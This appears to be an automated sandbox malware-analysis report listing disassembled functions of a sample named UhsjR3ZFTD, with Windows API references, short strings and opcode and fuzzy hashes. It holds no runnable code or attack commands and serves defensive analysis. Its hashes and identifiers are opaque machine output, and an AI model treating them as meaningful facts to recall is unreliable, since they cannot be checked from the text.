Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f10ef63025d853010bbcd235c1ddb8abbacb0ba491801d8f95867e39bd8927
Instruction ID: d899a92072081549aacd0a373389c60e53af17a8a0474f1d80352f716c791a12
Opcode Fuzzy Hash: 01f10ef63025d853010bbcd235c1ddb8abbacb0ba491801d8f95867e39bd8927
Instruction Fuzzy Hash: 98012821B0D7608BD319CB69A49132BFBD2DBEA704F18985ED0DBD7310D928CD02479E

Function 0043E19A Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4891f18ca3c17b38bf2b15199dfd40243cf34308cd727dcd2b612a98463f970
Instruction ID: 571c051b1a7b4a12d511d6b327af5e60c1d357793d73ac2cbf614903c133d6ad
Opcode Fuzzy Hash: a4891f18ca3c17b38bf2b15199dfd40243cf34308cd727dcd2b612a98463f970
Instruction Fuzzy Hash: 1001D8756592508BE3084F96E49077B73A9EB8F301F19783EC481576C2C3389C128B4F

Function 00402B60 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f638a3506d36bf050616cf4e3f80a7ef195994cbd757f6b5d36e659fde1be3a
Instruction ID: b2d8b3f25d2a6363043d8991c3fea2fcaa9534d5848f355d0d58bc03b07a957b
Opcode Fuzzy Hash: 8f638a3506d36bf050616cf4e3f80a7ef195994cbd757f6b5d36e659fde1be3a
Instruction Fuzzy Hash: 9BF0286A76830A0BD310DDFAADC456BB3E1D7D5214F194539E940E3341E4F8F80681A8

Function 0043DFB3 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6715dbe9d135ac45bdbd9ac448563beeb8c9300e3d08683238c916d7afe545dc
Instruction ID: 7c963995ffd6ab337d9a695198e0a5d7bcf509792ecc366c678e3cf94aa25ffd
Opcode Fuzzy Hash: 6715dbe9d135ac45bdbd9ac448563beeb8c9300e3d08683238c916d7afe545dc
Instruction Fuzzy Hash: 3101443A3946018FD70CDF28E8A16FAB7A6E786300F0D543DC482C3221EA38E911C648

Function 00420BD3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b88062f56769bb86136e5b0f9c197fa5aab20b91b17b8cecccb4b899e00228a
Instruction ID: df34008647d778bb7c521eae4ddccb3a733cd5fde321c9630a51ec9e0fc568b0
Opcode Fuzzy Hash: 2b88062f56769bb86136e5b0f9c197fa5aab20b91b17b8cecccb4b899e00228a
Instruction Fuzzy Hash: 2BB092E9C0B41086D015AB11BC024ABB0268913348F1424BAE80632282AA6AEA1E40DF

Function 0043D818 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b620c91a42edb0786d309cbcea9fd596892cbdb30a322ebafa140b7a14dfef1
Instruction ID: 86aa6f376ae128fac203354b731e992d447e72622e96fa66a5b9d7e17052ec8c
Opcode Fuzzy Hash: 7b620c91a42edb0786d309cbcea9fd596892cbdb30a322ebafa140b7a14dfef1
Instruction Fuzzy Hash: A7B09228AAC050C7920CCF24D8909B2B2BBDB87608A14B268D04B23226D220E802970C

Function 004321FB Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 105COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00432204
VariantInit.OLEAUT32 ref: 00432210

Strings

|, xrefs: 00432236
l, xrefs: 00432276
j, xrefs: 0043225E
n, xrefs: 0043226E
b, xrefs: 0043223E
`, xrefs: 00432246
h, xrefs: 00432266
d, xrefs: 00432256
x, xrefs: 00432226
~, xrefs: 0043222E
f, xrefs: 0043224E

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: Variant$ClearInit
String ID: `$b$d$f$h$j$l$n$x$|$~
API String ID: 2610073882-2392625418
Opcode ID: d56210b6122cd0a81d0aed4da15e1541f510ecdfe567a2f287f30a5ea68c2328
Instruction ID: b79967f44f2bd9de6c2e39eb15a986492cae5a4b6d791275bc0e3f4af17e2b78
Opcode Fuzzy Hash: d56210b6122cd0a81d0aed4da15e1541f510ecdfe567a2f287f30a5ea68c2328
Instruction Fuzzy Hash: A4414A71208B818BD725CF3CC884646BFA2AB56224F18869CD8E54F3EAD3B9D415C762

Function 00431FCB Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 100COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431FD8
VariantInit.OLEAUT32 ref: 00431FE4

Strings

x, xrefs: 00432000
j, xrefs: 00432038
h, xrefs: 00432040
b, xrefs: 00432018
~, xrefs: 00432008
`, xrefs: 00432020
|, xrefs: 00432010
f, xrefs: 00432028
d, xrefs: 00432030
n, xrefs: 00432048
l, xrefs: 00432050

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: Variant$ClearInit
String ID: `$b$d$f$h$j$l$n$x$|$~
API String ID: 2610073882-2392625418
Opcode ID: 1ace8412bc45bfffb96bd3be78b6ed24615df238187204af6596b75391cea6f0
Instruction ID: d4354520380d8857094eb198d18f80dccd27335c0442324ae3d10dc815d509f5
Opcode Fuzzy Hash: 1ace8412bc45bfffb96bd3be78b6ed24615df238187204af6596b75391cea6f0
Instruction Fuzzy Hash: 7F413B70208B818FD725CF3CC894316BFE2AB56224F08869CE8E58F3D6C679D515C766

Function 006C1C10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 006C1C3B
GetFileSize.KERNEL32 ref: 006C1CC3
CloseHandle.KERNEL32 ref: 006C1CDF

Strings

CreateFileA, xrefs: 006C1C2E

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: AddressCloseFileHandleProcSize
String ID: CreateFileA
API String ID: 2836222988-1429953656
Opcode ID: 1941b09e9cc8073a9be47699593869403c3c2540d5a1a10f754cb863f2cbff5d
Instruction ID: 91baa2a37258f921140ddebc381fd2ba2dd5bcd4b2b7fedb82596daafc8be04b
Opcode Fuzzy Hash: 1941b09e9cc8073a9be47699593869403c3c2540d5a1a10f754cb863f2cbff5d
Instruction Fuzzy Hash: E741C3B09083498FDB00EFA8D4987AEBBF1EF49310F00852DE859AB351D7749549CF92

Function 006C20B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006C20D6
GetProcAddress.KERNEL32 ref: 006C20EE
CreateThread.KERNEL32 ref: 006C213B
WaitForSingleObject.KERNEL32 ref: 006C2155
CloseHandle.KERNEL32 ref: 006C2164

Strings

FreeConsole, xrefs: 006C20E1
kernel32.dll, xrefs: 006C20CD

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Handle$AddressCloseCreateModuleObjectProcSingleThreadWait
String ID: FreeConsole$kernel32.dll
API String ID: 1580151904-2564406000
Opcode ID: 47faf96f0aceb55235ca9f6745d53d22279a70193cc71d30f317f3e2181cf2a0
Instruction ID: 2796f4e22746039ec1e910edd0490eeb8759645120122c13189ff44bb62eef80
Opcode Fuzzy Hash: 47faf96f0aceb55235ca9f6745d53d22279a70193cc71d30f317f3e2181cf2a0
Instruction Fuzzy Hash: 9021A8B09043499FDB40EFB8D98979EBBF1FB44300F40892DE8599B250EB749648CF92

Function 006E4142 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,006E412D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 006E41E8
__alloca_probe_16.LIBCMT ref: 006E42A3
__alloca_probe_16.LIBCMT ref: 006E4332
__freea.LIBCMT ref: 006E437D
__freea.LIBCMT ref: 006E4383
__freea.LIBCMT ref: 006E43B9
__freea.LIBCMT ref: 006E43BF
__freea.LIBCMT ref: 006E43CF

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: a54d103f039e00812d2bbfc8ce6b06f7bc14217fff1f62af5129727ba533da8e
Instruction ID: 67e2f6273e195eea468e57f86b657494f05805c0a83859fc58e270b2f959a82b
Opcode Fuzzy Hash: a54d103f039e00812d2bbfc8ce6b06f7bc14217fff1f62af5129727ba533da8e
Instruction Fuzzy Hash: 6871C1329013859ADF20AEB68C41FFE77ABAF49350F290159F914EB381EF759D0087A4

Function 006D8226 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 006D82AC

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 72974dffd406f4600ff762acc25dc65bf06a15d61c9fdd7785344ebde1d75b22
Instruction ID: 6b363523dc4633402371d2f35a00bd64e81b204f7cd28d4ad2eee28e62d97940
Opcode Fuzzy Hash: 72974dffd406f4600ff762acc25dc65bf06a15d61c9fdd7785344ebde1d75b22
Instruction Fuzzy Hash: 03B16632D013969FDB218F68CC85BFE7BA6EF59350F14416AE904AB382DA749D01C7A0

Function 006D49BC Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 006D4ADB
CallUnexpected.LIBVCRUNTIME ref: 006D4D54

Strings

csm, xrefs: 006D4B12
xfn, xrefs: 006D4AD2
csm, xrefs: 006D49F9
csm, xrefs: 006D4A66

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm$xfn
API String ID: 2673424686-305129718
Opcode ID: 972bc72f9680d1d0acda0d28aac94c71d5d166d6e869f42e4fcebf1c3312a9ab
Instruction ID: a033ce138899878234963caf1e0fab75f74c859d8313aee410f07890b9d52334
Opcode Fuzzy Hash: 972bc72f9680d1d0acda0d28aac94c71d5d166d6e869f42e4fcebf1c3312a9ab
Instruction Fuzzy Hash: 85B14471C01219EBCF28DFA4C8819AEBBB6FF14310B14416BE9116B316DB71DE51CBA5

Function 006CAC10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 006CAC47
___except_validate_context_record.LIBVCRUNTIME ref: 006CAC4F
_ValidateLocalCookies.LIBCMT ref: 006CACD8
__IsNonwritableInCurrentImage.LIBCMT ref: 006CAD03
_ValidateLocalCookies.LIBCMT ref: 006CAD58

Strings

csm, xrefs: 006CACED

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: d5fc88ff79d1b2f708a75e234919b8aab431ffc0568431a948a8a028a80d05a2
Instruction ID: 19b2a1f84b8328c17191ec5ebc1fb50a983422959f29f545855829ae820d2cee
Opcode Fuzzy Hash: d5fc88ff79d1b2f708a75e234919b8aab431ffc0568431a948a8a028a80d05a2
Instruction Fuzzy Hash: 6141A230E0021C9BCF10EFA8C885EAE7BA3EF45318F14815AE8159B352D735AE15CBD6

Function 006D62B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,006D63C1,00000000,00000000,00000000,00000000), ref: 006D6373

Strings

ext-ms-, xrefs: 006D631D
api-ms-, xrefs: 006D6309

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: dd12038cf5e1147218962d83901b3fee0cf8660f8473c434a715f9ed31d21b6b
Instruction ID: 7582bc0679f4c94040c23d1eac16d609c1203fd6d8bb6a84ef2ad1279e6bff75
Opcode Fuzzy Hash: dd12038cf5e1147218962d83901b3fee0cf8660f8473c434a715f9ed31d21b6b
Instruction Fuzzy Hash: FD21EB31E01214E7D7219B65DC45AEE375BAB527A0F162226FD16AB3D1D731ED00C6E0

Function 006E2DAC Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96279efcac15d412328f18677dc6f0c0d04848db0c2b776ad7dbb28d38857621
Instruction ID: 687477f443cda2c1ef3a684553add0255c1ddabca16d3566bedc93ee035329ff
Opcode Fuzzy Hash: 96279efcac15d412328f18677dc6f0c0d04848db0c2b776ad7dbb28d38857621
Instruction Fuzzy Hash: F8B10170E0139AAFDB11DF5AC895BFD7BB7AF16310F144249E411AB392C7B09A42CB60

Function 006D40DC Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,006D40D3,006CA9DD,006C9C34), ref: 006D40EA
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006D40F8
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006D4111
SetLastError.KERNEL32(00000000,006D40D3,006CA9DD,006C9C34), ref: 006D4163

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 69449f94724db45ad2d8ba12ce1ca990fac870c24a9da5b62d6d560353e63d2a
Instruction ID: a8a41959641f969de0ac97b16e5550582cdad4e6dc1e876967de5bda046e0e9a
Opcode Fuzzy Hash: 69449f94724db45ad2d8ba12ce1ca990fac870c24a9da5b62d6d560353e63d2a
Instruction Fuzzy Hash: 9801D432A0A3165FB7642B74BCC65B72697DB62375B20123FF520A53F2FEA24C41D684

Function 006CF258 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,006E56A4,000000FF,?,006CF319,006CF200,?,006CF3B5,00000000), ref: 006CF28D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006CF29F
FreeLibrary.KERNEL32(00000000,?,?,00000000,006E56A4,000000FF,?,006CF319,006CF200,?,006CF3B5,00000000), ref: 006CF2C1

Strings

CorExitProcess, xrefs: 006CF297
mscoree.dll, xrefs: 006CF286

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: dca1e3b166d4bcb833ac2eeacb15dbd2bfe53e3a063bd4eecf7ab0196ba29901
Instruction ID: 31f0ec6dfd76a9be7a3c6e01d40a4ac6a9884729d189ad57deff91857f852d54
Opcode Fuzzy Hash: dca1e3b166d4bcb833ac2eeacb15dbd2bfe53e3a063bd4eecf7ab0196ba29901
Instruction Fuzzy Hash: 5301A236940795ABDB018F80CC45FFEBBBAFB04B15F00062AFC12A62A0DB759900CA80

Function 006D6A9A Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 006D6B1F
__alloca_probe_16.LIBCMT ref: 006D6BE8
__freea.LIBCMT ref: 006D6C4F

Part of subcall function 006D5361: HeapAlloc.KERNEL32(00000000,006D72E5,?,?,006D72E5,00000220,?,?,?), ref: 006D5393

__freea.LIBCMT ref: 006D6C62
__freea.LIBCMT ref: 006D6C6F

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 017f33c651c643d6bb3d23c77a6e6dbeb78e76857627223e949bccb131e362e5
Instruction ID: 9c7e242b89285c7061b3d002a07f5b4f0cfd808715befe883f654b6ad7402c0e
Opcode Fuzzy Hash: 017f33c651c643d6bb3d23c77a6e6dbeb78e76857627223e949bccb131e362e5
Instruction Fuzzy Hash: 1151B272A10206AFEB205FA5CC85EFB76ABEF44B50F19002EFD45D6351EB71DC1096A4

Function 006C7852 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 006C7859
std::_Lockit::_Lockit.LIBCPMT ref: 006C7864
std::_Lockit::~_Lockit.LIBCPMT ref: 006C78D2

Part of subcall function 006C774F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006C7767

std::locale::_Setgloballocale.LIBCPMT ref: 006C787F
_Yarn.LIBCPMT ref: 006C7895

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 71fc25e41a1f8c1056146debabbbb326db208cef5b153fec13cd972151857ec4
Instruction ID: ef7a70199d41bc448de90bbac322d765599dd1449cf1f69fcff2d508b12e204e
Opcode Fuzzy Hash: 71fc25e41a1f8c1056146debabbbb326db208cef5b153fec13cd972151857ec4
Instruction Fuzzy Hash: 9301BCB5A056149BCB46EF20C849A7C7B63FF95380B14041DE8025B382CF34AE06CFD9

Function 0042D00D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 289COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0042D2C2

Strings

!, xrefs: 0042D2E4
0, xrefs: 0042D25F
#v, xrefs: 0042D2C2

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: FreeLibrary
String ID: !$0$#v
API String ID: 3664257935-3002211246
Opcode ID: a59b02c1f9b8175dae2b6d0af442bdd73a96467c1f50dfe658eb48a36293ef53
Instruction ID: 363f3f82d949639bcd6d0eea56e432ff8ce25dbbcf70693a7459fa4f30c8f00e
Opcode Fuzzy Hash: a59b02c1f9b8175dae2b6d0af442bdd73a96467c1f50dfe658eb48a36293ef53
Instruction Fuzzy Hash: 77816C31A083908AD728CF29944177FFFE2AFD6304F28466ED4D59B391C67C8945C75A

Function 006DF5C1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,006DF65D,00000000,?,006F1E18,?,?,?,006DF594,00000004,InitializeCriticalSectionEx,006E90D4,006E90DC), ref: 006DF5CE
GetLastError.KERNEL32(?,006DF65D,00000000,?,006F1E18,?,?,?,006DF594,00000004,InitializeCriticalSectionEx,006E90D4,006E90DC,00000000,?,006D500C), ref: 006DF5D8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 006DF600

Strings

api-ms-, xrefs: 006DF5E5

Memory Dump Source

Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
